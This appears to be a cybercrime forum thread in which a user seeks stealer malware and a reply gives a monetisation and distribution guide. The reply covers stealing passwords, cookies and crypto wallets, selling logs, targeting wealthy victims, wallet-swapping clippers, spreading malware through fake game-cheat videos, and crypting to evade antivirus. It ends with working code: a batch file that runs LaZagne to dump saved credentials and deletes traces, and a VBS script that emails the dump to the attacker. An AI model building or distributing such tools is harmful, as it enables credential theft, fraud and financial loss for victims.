I searching For Stealer


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im searching for Stealer
Logs Stealer

And is there any PDF stealer to Sell on the Market?


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Stealer is a viral software that is used to steal the logins and passwords of a potential victim.

Principle of operation
Stealers are different, from different coders with different capabilities.

Stealer can steal all passwords saved by you from all browsers, telegram session, cookies (for entering sites), files of cold wallets of popular cryptocurrencies for further cashing them, files from the desktop of a certain extension .pdf / .doc / .docx / .txt / .log (often people store a file with passwords right on the desktop).

All this data comes to you in the admin panel, where it is indicated from which IP address and computer name it all came. Roughly speaking, we can take all the most valuable things that can be on the computer.


What the admin panel looks like

After the purchase, you are usually given a ready-to-use version of the software with access to the admin panel, you do not need to configure anything further.

Monetization methods
Using the received e-mail of the victim, you can restore many interesting accounts, do not ignore this opportunity.
Some, not finding anything interesting, just sell the logs on various forums to beginners, having decent software, you can quickly scatter accounts into daddies and start trading them.
But the most profitable use of the stealer is point attacks - you first find a large fish, a crypto investor, the owner of the VK public, the owner of a qiwi wallet, and so on, and with the help of SI skills, we throw him a stealer.

How to distribute?
It is necessary to pour traffic to the stealer so that it would not be thrown immediately onto the total virus (online virus scanner), that is, the user should not guess that they are trying to slip a virus on him.

The most popular free distribution method is YouTube, just upload a bunch of videos about cheats for different games and catch the installs. It's not worth buying paid downloads right away, it's better to first understand how everything works using free distribution methods, especially if you buy them, then you need to pour installations on a stealer + clipper, as this will significantly increase the potential profit.

Clipper is a virus that replaces wallet numbers in the victim's clipboard with yours, most importantly for cryptocurrencies, so when a mammoth uses a cryptocurrency exchanger for the first time in its life, it transfers money to you immediately. I personally and 5 of my close friends have made money on the clipper, so you shouldn't underestimate it, especially since they do not interfere with each other in conjunction.

Detectors - the number of activations that regard your virus as malware, there are several of them on any online scanner, so they always say 0 out of 35, and so on. A completely clean file is often referred to simply as FUD, which stands for fully undetected (not fired at all).

In its pure form, no one distributes the stealer - before these they crypt it (the process of building up excess tinsel on your file to get rid of detections, cryptography can be very different, I write about methods that are now widely used by consumers, but in general, the best option is of course to clean the source code , but naturally no one will show it to you if you are a user of the software, not its creator. Crypto services cost about 7-15 dollars if you buy them. You need to update the crypt depending on how and where you pour traffic.


Some scanners increase detections, and some do not, but I think it makes no sense to write about this, since at the time of reading the information may no longer be relevant. Also, an important detail will be that you cannot pour on any file exchanger, since most of the popular ones check files for viruses and this adds detections.

Where to get?
To buy a trite Google, I don't think that it makes sense now to write a stealer myself, it is already difficult to compete. I will not advise and advertise anyone, I will just say that you need to buy from trusted sellers and use a guarantor (although even this will not protect against scam 100%)

Verified Stealer's Sellers:


Other good and popular stealers:
1. KPOT Stealer
2. Oski Stealer
3. Predator The Thief


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A simple do-it-yourself stealer.

We need:
1. LaZagne - a program for recovering passwords and writing them to a file.
2. Batch file for launching LaZagne and specifying the directory for saving the report and its name.
3. Script on VBS for sending a letter to a postal address.
4. VBS to EXE converter (optional, it is possible without it).
5. Converter BAT to EXE.

Step 1.
Create a Batch file with the following lines:
@Echo off
laZagne.exe all> D: \ install_error.bin
del / s "% UserProfile% \ Downloads \ laZagne.exe"
del / s "% UserProfile% \ Downloads \ SENDER.exe"
del / s "% UserProfile% \ Desktop \ laZagne.exe"
del / s "% UserProfile% \ Desktop \ SENDER.exe"

Where "D: \ install_error.bin" is the directory and name of the saved report, TIMEOUT is needed to wait for the report to be generated (on average, this process takes 1 second for 100 passwords).

Step 2.
Create a plain text document in Notepad ++, for example. And save it in .vbs format
Dim o_Mess, v_Conf
v_Conf = "http://schemas.microsoft.com/cdo/configuration/"
Set o_Mess = CreateObject ("CDO.Message")
With o_Mess
.To = "[email protected]" 'where we send
.From = "Name <[email protected]>" 'sender name + Email
.Subject = "Log" 'Email subject
.TextBody = "BodyMail" 'Message
.AddAttachment "D: \ install_error.bin" 'Attach file
.TextBodyPart.Charset = "windows-1251" 'Russian encoding
With .Configuration.Fields
.Item (v_Conf & "sendusing") = 2 'without using the Exchange Server directory
.Item (v_Conf & "smtpserver") = "smtp.mail.ru" 'SMTP server address
.Item (v_Conf & "smtpauthenticate") = 1 'Authorization type
.Item (v_Conf & "sendusername") = "[email protected]" 'here is the username
.Item (v_Conf & "sendpassword") = "sender password" 'password
.Item (v_Conf & "smtpserverport") = 465 'port (alternative - 465)
.Item (v_Conf & "smtpusessl") = True 'whether to use SSL encrypted connection
.Item (v_Conf & "smtpconnectiontimeout") = 60 'Time to complete connection retries
End With
End With
Set o_Mess = Nothing

Step 3.
We compile this mess through the BAT to EXE converter.
Note: Pay attention to the SENDER.EXE file, in this case the VBS to EXE converter was used.
After that, we save our .exe file and run it.

Step 4.
We go to the mailbox and check the letter.

Step 5.
We open the file on our computer through a text editor and enjoy the profit.
